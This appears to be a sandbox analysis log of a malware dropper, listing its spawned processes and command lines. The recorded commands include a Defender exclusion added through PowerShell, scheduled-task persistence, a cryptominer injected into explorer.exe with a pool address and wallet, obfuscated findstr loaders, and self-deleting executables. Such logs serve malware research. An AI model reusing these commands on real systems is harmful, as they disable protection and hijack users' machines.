PID 1264 wrote to memory of 1472	1264	setup_install.exe	29
PID 1264 wrote to memory of 1548	1264	setup_install.exe	57
PID 1264 wrote to memory of 1548	1264	setup_install.exe	57
PID 1264 wrote to memory of 1548	1264	setup_install.exe	57
PID 1264 wrote to memory of 1548	1264	setup_install.exe	57
PID 1264 wrote to memory of 1548	1264	setup_install.exe	57
PID 1264 wrote to memory of 1548	1264	setup_install.exe	57
PID 1264 wrote to memory of 1548	1264	setup_install.exe	57
PID 1264 wrote to memory of 1464	1264	setup_install.exe	30
PID 1264 wrote to memory of 1464	1264	setup_install.exe	30
PID 1264 wrote to memory of 1464	1264	setup_install.exe	30
PID 1264 wrote to memory of 1464	1264	setup_install.exe	30
PID 1264 wrote to memory of 1464	1264	setup_install.exe	30
PID 1264 wrote to memory of 1464	1264	setup_install.exe	30
PID 1264 wrote to memory of 1464	1264	setup_install.exe	30
PID 1264 wrote to memory of 1400	1264	setup_install.exe	31
PID 1264 wrote to memory of 1400	1264	setup_install.exe	31
PID 1264 wrote to memory of 1400	1264	setup_install.exe	31
PID 1264 wrote to memory of 1400	1264	setup_install.exe	31
PID 1264 wrote to memory of 1400	1264	setup_install.exe	31
PID 1264 wrote to memory of 1400	1264	setup_install.exe	31
PID 1264 wrote to memory of 1400	1264	setup_install.exe	31
PID 1264 wrote to memory of 528	1264	setup_install.exe	56
PID 1264 wrote to memory of 528	1264	setup_install.exe	56
PID 1264 wrote to memory of 528	1264	setup_install.exe	56
PID 1264 wrote to memory of 528	1264	setup_install.exe	56
PID 1264 wrote to memory of 528	1264	setup_install.exe	56
PID 1264 wrote to memory of 528	1264	setup_install.exe	56
PID 1264 wrote to memory of 528	1264	setup_install.exe	56
PID 1264 wrote to memory of 576	1264	setup_install.exe	55
PID 1264 wrote to memory of 576	1264	setup_install.exe	55
PID 1264 wrote to memory of 576	1264	setup_install.exe	55
PID 1264 wrote to memory of 576	1264	setup_install.exe	55
PID 1264 wrote to memory of 576	1264	setup_install.exe	55
PID 1264 wrote to memory of 576	1264	setup_install.exe	55
PID 1264 wrote to memory of 576	1264	setup_install.exe	55
PID 1264 wrote to memory of 1512	1264	setup_install.exe	54
PID 1264 wrote to memory of 1512	1264	setup_install.exe	54
PID 1264 wrote to memory of 1512	1264	setup_install.exe	54
PID 1264 wrote to memory of 1512	1264	setup_install.exe	54
PID 1264 wrote to memory of 1512	1264	setup_install.exe	54
PID 1264 wrote to memory of 1512	1264	setup_install.exe	54
PID 1264 wrote to memory of 1512	1264	setup_install.exe	54
PID 1264 wrote to memory of 1516	1264	setup_install.exe	53

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1036
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1164
- - C:\Users\Admin\AppData\Local\Temp\7zSC8484364\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zSC8484364\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1264
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      PID:1472
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        
        PID:860
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri192b9eeaa03b.exe
      4⤵
      Loads dropped DLL
      PID:1464
    - - C:\Users\Admin\AppData\Local\Temp\7zSC8484364\Fri192b9eeaa03b.exe
        
        Fri192b9eeaa03b.exe
        5⤵
        Executes dropped EXE
        
        PID:1044
      - C:\Users\Admin\AppData\Local\Temp\is-FI7IO.tmp\Fri192b9eeaa03b.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-FI7IO.tmp\Fri192b9eeaa03b.tmp" /SL5="$20180,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSC8484364\Fri192b9eeaa03b.exe"
        6⤵
        
        PID:2300
        
        C:\Users\Admin\AppData\Local\Temp\is-29RFU.tmp\46807GHF____.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-29RFU.tmp\46807GHF____.exe" /S /UID=burnerch2
        7⤵
        
        PID:3144
        
        C:\Program Files\Common Files\MXEWNDTLEH\ultramediaburner.exe
        
        "C:\Program Files\Common Files\MXEWNDTLEH\ultramediaburner.exe" /VERYSILENT
        8⤵
        
        PID:3992
        
        C:\Users\Admin\AppData\Local\Temp\is-K72UC.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-K72UC.tmp\ultramediaburner.tmp" /SL5="$30340,281924,62464,C:\Program Files\Common Files\MXEWNDTLEH\ultramediaburner.exe" /VERYSILENT
        9⤵
        
        PID:4028
        
        C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        10⤵
        
        PID:2940
        
        C:\Users\Admin\AppData\Local\Temp\83-14533-8b0-55090-1b01f175ca916\Kanakifose.exe
        
        "C:\Users\Admin\AppData\Local\Temp\83-14533-8b0-55090-1b01f175ca916\Kanakifose.exe"
        8⤵
        
        PID:4036
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
        9⤵
        
        PID:1096
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1096 CREDAT:275457 /prefetch:2
        10⤵
        
        PID:3708
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1096 CREDAT:1586225 /prefetch:2
        10⤵
        
        PID:2440
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
        9⤵
        
        PID:3236
        
        C:\Users\Admin\AppData\Local\Temp\63-397f4-9db-57c84-2c2a2294667d5\Dudewerory.exe
        
        "C:\Users\Admin\AppData\Local\Temp\63-397f4-9db-57c84-2c2a2294667d5\Dudewerory.exe"
        8⤵
        
        PID:4068
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tltxy4xv.cb5\GcleanerEU.exe /eufive & exit
        9⤵
        
        PID:2892
        
        C:\Users\Admin\AppData\Local\Temp\tltxy4xv.cb5\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\tltxy4xv.cb5\GcleanerEU.exe /eufive
        10⤵
        
        PID:2404
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\tltxy4xv.cb5\GcleanerEU.exe" & exit
        11⤵
        
        PID:2240
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "GcleanerEU.exe" /f
        12⤵
        Kills process with taskkill
        
        PID:748
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nb5mwod0.fak\installer.exe /qn CAMPAIGN="654" & exit
        9⤵
        
        PID:3916
        
        C:\Users\Admin\AppData\Local\Temp\nb5mwod0.fak\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\nb5mwod0.fak\installer.exe /qn CAMPAIGN="654"
        10⤵
        
        PID:3188
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5bjbxdwl.cgb\anyname.exe & exit
        9⤵
        
        PID:3104
        
        C:\Users\Admin\AppData\Local\Temp\5bjbxdwl.cgb\anyname.exe
        
        C:\Users\Admin\AppData\Local\Temp\5bjbxdwl.cgb\anyname.exe
        10⤵
        
        PID:3444
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2fcbb4iv.a0v\gcleaner.exe /mixfive & exit
        9⤵
        
        PID:2692
        
        C:\Users\Admin\AppData\Local\Temp\2fcbb4iv.a0v\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\2fcbb4iv.a0v\gcleaner.exe /mixfive
        10⤵
        
        PID:996
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\2fcbb4iv.a0v\gcleaner.exe" & exit
        11⤵
        
        PID:2336
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "gcleaner.exe" /f
        12⤵
        Kills process with taskkill
        
        PID:3340
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rhkzq3q4.g4b\autosubplayer.exe /S & exit
        9⤵
        
        PID:2120
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri191454c4b4.exe
      4⤵
      Loads dropped DLL
      PID:1400
    - - C:\Users\Admin\AppData\Local\Temp\7zSC8484364\Fri191454c4b4.exe
        
        Fri191454c4b4.exe
        5⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        
        PID:1624
      - C:\ProgramData\5565787.exe
        
        "C:\ProgramData\5565787.exe"
        6⤵
        
        PID:2244
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2244 -s 1736
        7⤵
        Program crash
        
        PID:3628
      - C:\ProgramData\4029970.exe
        
        "C:\ProgramData\4029970.exe"
        6⤵
        
        PID:2468
      - C:\ProgramData\4205188.exe
        
        "C:\ProgramData\4205188.exe"
        6⤵
        
        PID:1892
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri192f077acf656dd.exe
      4⤵
      Loads dropped DLL
      PID:440
    - - C:\Users\Admin\AppData\Local\Temp\7zSC8484364\Fri192f077acf656dd.exe
        
        Fri192f077acf656dd.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1628
      - C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
        6⤵
        
        PID:2440
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        7⤵
        
        PID:2080
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        8⤵
        Creates scheduled task(s)
        
        PID:1004
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        
        "C:\Users\Admin\AppData\Roaming\services64.exe"
        7⤵
        
        PID:2568
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        8⤵
        
        PID:3796
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        9⤵
        Creates scheduled task(s)
        
        PID:3876
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        8⤵
        
        PID:3860
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
        8⤵
        
        PID:3000
      - C:\Users\Admin\AppData\Local\Temp\1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1.exe"
        6⤵
        
        PID:2520
      - C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        6⤵
        
        PID:2596
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2596 -s 1408
        7⤵
        Program crash
        
        PID:3220
      - C:\Users\Admin\AppData\Local\Temp\3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3.exe"
        6⤵
        
        PID:2656
        
        C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        7⤵
        
        PID:2768
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "LzmwAqmV.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe" & exit
        8⤵
        
        PID:2812
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "LzmwAqmV.exe" /f
        9⤵
        Kills process with taskkill
        
        PID:3000
      - C:\Users\Admin\AppData\Local\Temp\4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4.exe"
        6⤵
        
        PID:2720
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2720 -s 876
        7⤵
        Program crash
        
        PID:2396
      - C:\Users\Admin\AppData\Local\Temp\5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5.exe"
        6⤵
        
        PID:2800
      - C:\Users\Admin\AppData\Local\Temp\6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\6.exe"
        6⤵
        
        PID:2884
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2884 -s 1376
        7⤵
        Program crash
        
        PID:3180
      - C:\Users\Admin\AppData\Local\Temp\7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7.exe"
        6⤵
        
        PID:2956
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2956 -s 1236
        7⤵
        Program crash
        
        PID:3328
      - C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
        6⤵
        
        PID:3020
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri19927b4fe38a9d1.exe
      4⤵
      Loads dropped DLL
      PID:1384
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri19ca03f05489b.exe
      4⤵
      Loads dropped DLL
      PID:1360
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri19870e2febf5544.exe
      4⤵
      Loads dropped DLL
      PID:1256
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri1921f7a9d3.exe
      4⤵
      Loads dropped DLL
      PID:600
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri19b9b73e83c948b1d.exe /mixone
      4⤵
      Loads dropped DLL
      PID:1516
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri19d30056588.exe
      4⤵
      Loads dropped DLL
      PID:1512
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri192902b3c24.exe
      4⤵
      Loads dropped DLL
      PID:576
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri195cd4dbfdf37897.exe
      4⤵
      Loads dropped DLL
      PID:528
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri192c305b4a.exe
      4⤵
      Loads dropped DLL
      PID:1548

C:\Users\Admin\AppData\Local\Temp\7zSC8484364\Fri19d30056588.exe
Fri19d30056588.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1640
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c taskkill /f /im chrome.exe
  2⤵
  PID:2480
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im chrome.exe
    3⤵
    - Kills process with taskkill
    PID:2500

C:\Users\Admin\AppData\Local\Temp\7zSC8484364\Fri192c305b4a.exe
Fri192c305b4a.exe
1⤵
- Executes dropped EXE
PID:1324
- C:\Users\Admin\AppData\Local\Temp\tmpA795_tmp.exe
  "C:\Users\Admin\AppData\Local\Temp\tmpA795_tmp.exe"
  2⤵
  PID:3984
- - C:\Windows\SysWOW64\dllhost.exe
    dllhost.exe
    3⤵
    PID:3664
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c cmd < Attesa.wmv
    3⤵
    PID:2012
  - - C:\Windows\SysWOW64\cmd.exe
      cmd
      4⤵
      PID:792
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /R "^VksJcWfNcDMqfgfCCoOQaENLrlkioAEZRevWUFgpnuTZyylQxdxsqDodbFGlKiEVZMohRaHWUFajKOGYZxNRyhZgTymgZtndBYqaWXYwInbclWFIZIldx$" Braccio.wmv
        5⤵
        
        PID:3636
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping localhost
        5⤵
        Runs ping.exe
        
        PID:3960
    - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
        
        Adorarti.exe.com u
        5⤵
        
        PID:3936
      - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
        6⤵
        
        PID:2404
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
        7⤵
        
        PID:3936

C:\Users\Admin\AppData\Local\Temp\7zSC8484364\Fri19927b4fe38a9d1.exe
Fri19927b4fe38a9d1.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:472

C:\Users\Admin\AppData\Local\Temp\is-58SM8.tmp\Fri195cd4dbfdf37897.tmp
"C:\Users\Admin\AppData\Local\Temp\is-58SM8.tmp\Fri195cd4dbfdf37897.tmp" /SL5="$50130,138429,56832,C:\Users\Admin\AppData\Local\Temp\7zSC8484364\Fri195cd4dbfdf37897.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:432
- C:\Users\Admin\AppData\Local\Temp\is-3U86B.tmp\Setup.exe
  "C:\Users\Admin\AppData\Local\Temp\is-3U86B.tmp\Setup.exe" /Verysilent
  2⤵
  PID:2316
- - C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe
    "C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"
    3⤵
    PID:3028
  - - C:\Users\Admin\AppData\Local\Temp\Mortician.exe
      "C:\Users\Admin\AppData\Local\Temp\Mortician.exe"
      4⤵
      PID:3516
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c cmd < Cerchia.vsdx
        5⤵
        
        PID:3548
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd
        6⤵
        
        PID:3580
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /R "^JdxmflaMoKJKGKEonRKIDlCuNBztuuxobvTVXbusdtKZTUcnQFZrvdHmOhLNQgGwfAjlQJkqLaammCjTuVhBisMuOxuJLaA$" Attesa.vsdx
        7⤵
        
        PID:3596
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        Impedire.exe.com I
        7⤵
        
        PID:3644
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        8⤵
        
        PID:4008
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        9⤵
        
        PID:2904
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        10⤵
        
        PID:2700
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        11⤵
        
        PID:1968
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        12⤵
        
        PID:3400
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        13⤵
        
        PID:3672
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        14⤵
        
        PID:3452
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        15⤵
        
        PID:3876
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        16⤵
        
        PID:3496
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        17⤵
        
        PID:3148
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        18⤵
        
        PID:1464
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        19⤵
        
        PID:1280
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com
        
        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
        20⤵
        
        PID:3188
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping localhost
        7⤵
        Runs ping.exe
        
        PID:3680
  - - C:\Users\Admin\AppData\Local\Temp\foradvertising.exe
      "C:\Users\Admin\AppData\Local\Temp\foradvertising.exe" /wws1
      4⤵
      PID:3912
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "foradvertising.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\foradvertising.exe" & exit
        5⤵
        
        PID:4088
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "foradvertising.exe" /f
        6⤵
        Kills process with taskkill
        
        PID:1972
  - - C:\Users\Admin\AppData\Local\Temp\wrap 1.exe
      "C:\Users\Admin\AppData\Local\Temp\wrap 1.exe"
      4⤵
      PID:836
  - - C:\Users\Admin\AppData\Local\Temp\gdgame.exe
      "C:\Users\Admin\AppData\Local\Temp\gdgame.exe"
      4⤵
      PID:1820
    - - C:\Users\Admin\AppData\Local\Temp\gdgame.exe
        
        "C:\Users\Admin\AppData\Local\Temp\gdgame.exe" -a
        5⤵
        
        PID:3104
  - - C:\Users\Admin\AppData\Local\Temp\installer.exe
      "C:\Users\Admin\AppData\Local\Temp\installer.exe" /qn CAMPAIGN="710"
      4⤵
      PID:3472
  - - C:\Users\Admin\AppData\Local\Temp\jg6_6asg.exe
      "C:\Users\Admin\AppData\Local\Temp\jg6_6asg.exe"
      4⤵
      PID:3620
- - C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe
    "C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent
    3⤵
    PID:2508
  - - C:\Users\Admin\AppData\Local\Temp\is-O3H52.tmp\stats.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-O3H52.tmp\stats.tmp" /SL5="$60170,138429,56832,C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent
      4⤵
      PID:2200

C:\Users\Admin\AppData\Local\Temp\7zSC8484364\Fri19ca03f05489b.exe
Fri19ca03f05489b.exe
1⤵
- Executes dropped EXE
PID:868

C:\Users\Admin\AppData\Local\Temp\7zSC8484364\Fri19b9b73e83c948b1d.exe
Fri19b9b73e83c948b1d.exe /mixone
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1976
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /im "Fri19b9b73e83c948b1d.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSC8484364\Fri19b9b73e83c948b1d.exe" & exit
  2⤵
  PID:2272
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im "Fri19b9b73e83c948b1d.exe" /f
    3⤵
    - Kills process with taskkill
    PID:2340

C:\Users\Admin\AppData\Local\Temp\7zSC8484364\Fri1921f7a9d3.exe
Fri1921f7a9d3.exe
1⤵
- Executes dropped EXE
PID:1992

C:\Users\Admin\AppData\Local\Temp\7zSC8484364\Fri195cd4dbfdf37897.exe
Fri195cd4dbfdf37897.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:332

C:\Users\Admin\AppData\Local\Temp\7zSC8484364\Fri19870e2febf5544.exe
Fri19870e2febf5544.exe
1⤵
PID:1596

C:\Users\Admin\AppData\Local\Temp\7zSC8484364\Fri192902b3c24.exe
Fri192902b3c24.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:872
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 872 -s 976
  2⤵
  - Program crash
  PID:3296

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1596

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
1⤵
PID:2856
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2856 CREDAT:275457 /prefetch:2
  2⤵
  PID:2144

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:3260
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:3276

C:\Users\Admin\AppData\Local\Temp\9711.exe
C:\Users\Admin\AppData\Local\Temp\9711.exe
1⤵
PID:2684

C:\Users\Admin\AppData\Local\Temp\DE5F.exe
C:\Users\Admin\AppData\Local\Temp\DE5F.exe
1⤵
PID:3388
- C:\Users\Admin\AppData\Local\Temp\DE5F.exe
  C:\Users\Admin\AppData\Local\Temp\DE5F.exe
  2⤵
  PID:2812

C:\Users\Admin\AppData\Local\Temp\52B4.exe
C:\Users\Admin\AppData\Local\Temp\52B4.exe
1⤵
PID:1836
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\52B4.exe"
  2⤵
  PID:1684
- - C:\Windows\SysWOW64\timeout.exe
    timeout /T 10 /NOBREAK
    3⤵
    - Delays execution with timeout.exe
    PID:3364
- C:\Users\Admin\AppData\Local\Temp\gtaONCxRBl.exe
  "C:\Users\Admin\AppData\Local\Temp\gtaONCxRBl.exe"
  2⤵
  PID:4044
- - C:\Windows\SysWOW64\schtasks.exe
    /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe"
    3⤵
    - Creates scheduled task(s)
    PID:3764

C:\Users\Admin\AppData\Local\Temp\F0E7.exe
C:\Users\Admin\AppData\Local\Temp\F0E7.exe
1⤵
PID:3964

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:1748
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:1996

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:2072
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 24C0DE4681A88651A1F1341851D4ADDC C
  2⤵
  PID:2292

C:\Users\Admin\AppData\Local\Temp\C3E0.exe
C:\Users\Admin\AppData\Local\Temp\C3E0.exe
1⤵
PID:3664

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
PID:3164
